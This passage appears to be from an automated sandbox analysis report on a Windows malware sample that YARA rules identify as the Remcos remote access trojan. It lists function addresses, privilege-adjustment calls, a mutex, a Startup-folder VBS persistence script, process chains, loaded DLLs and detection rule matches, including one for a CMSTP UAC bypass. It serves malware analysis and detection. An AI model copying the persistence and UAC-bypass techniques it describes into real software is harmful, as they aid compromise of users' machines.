                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005E3030
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005FF1D9
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005F3187
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005D1287
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005F1484
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005E5520
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005F7696
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005E5760
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005F1978
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_00609AB5
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_00657DDB
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005F1D90
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005FBDA6
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005DDF00
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_005E3FE0
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: 1_2_010FBE90
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: String function: 00887DE1 appears 35 times
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: String function: 008A0AE3 appears 70 times
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe; Code function: String function: 008A8900 appears 42 times
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: String function: 004020E7 appears 40 times
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: String function: 005F0AE3 appears 70 times
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: String function: 005D7DE1 appears 36 times
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: String function: 00401F66 appears 50 times
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: String function: 005F8900 appears 42 times
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: String function: 004338A5 appears 41 times
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe; Code function: String function: 00433FB0 appears 55 times
                Source: 7056ZCiFdE.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 4.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 4.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 4.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 4.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 4.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 4.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 1.2.Allene.exe.3920000.2.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 1.2.Allene.exe.3920000.2.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 1.2.Allene.exe.3920000.2.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 1.2.Allene.exe.3920000.2.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 1.2.Allene.exe.3920000.2.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 1.2.Allene.exe.3920000.2.raw.unpack, type: UNPACKEDPE; Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 4.2.Allene.exe.18b0000.2.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 4.2.Allene.exe.18b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 4.2.Allene.exe.18b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 1.2.Allene.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 1.2.Allene.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 1.2.Allene.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 4.2.Allene.exe.18b0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 4.2.Allene.exe.18b0000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 4.2.Allene.exe.18b0000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 1.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 1.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 1.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: Process Memory Space: Allene.exe PID: 7132, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: Allene.exe PID: 2872, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@6/7@0/1
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008EA06A GetLastError,FormatMessageW (0_2_008EA06A)
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008D81CB AdjustTokenPrivileges,CloseHandle (0_2_008D81CB)
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008D87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError (0_2_008D87E1)
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError (1_2_00416AB7)
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_006281CB AdjustTokenPrivileges,CloseHandle (1_2_006281CB)
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_006287E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError (1_2_006287E1)
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008EB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode (0_2_008EB3FB)
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008FEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle (0_2_008FEE0D)
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008EC397 CoInitialize,CoCreateInstance,CoUninitialize (0_2_008EC397)
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_00884E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource (0_2_00884E89)
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle (1_2_00419BC4)
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | File created: C:\Users\user\AppData\Local\Milburr
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-R1T905
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | File created: C:\Users\user\AppData\Local\Temp\autE914.tmp
                Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs"
                Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: 7056ZCiFdE.exe | ReversingLabs: Detection: 55%
                Source: 7056ZCiFdE.exe | Virustotal: Detection: 66%
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | File read: C:\Users\user\Desktop\7056ZCiFdE.exe
                Source: unknown | Process created: C:\Users\user\Desktop\7056ZCiFdE.exe "C:\Users\user\Desktop\7056ZCiFdE.exe"
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Process created: C:\Users\user\AppData\Local\Milburr\Allene.exe "C:\Users\user\Desktop\7056ZCiFdE.exe"
                Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs"
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Milburr\Allene.exe "C:\Users\user\AppData\Local\Milburr\Allene.exe"
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Process created: C:\Users\user\AppData\Local\Milburr\Allene.exe "C:\Users\user\Desktop\7056ZCiFdE.exe"
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Milburr\Allene.exe "C:\Users\user\AppData\Local\Milburr\Allene.exe"
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: mswsock.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Section loaded: urlmon.dll
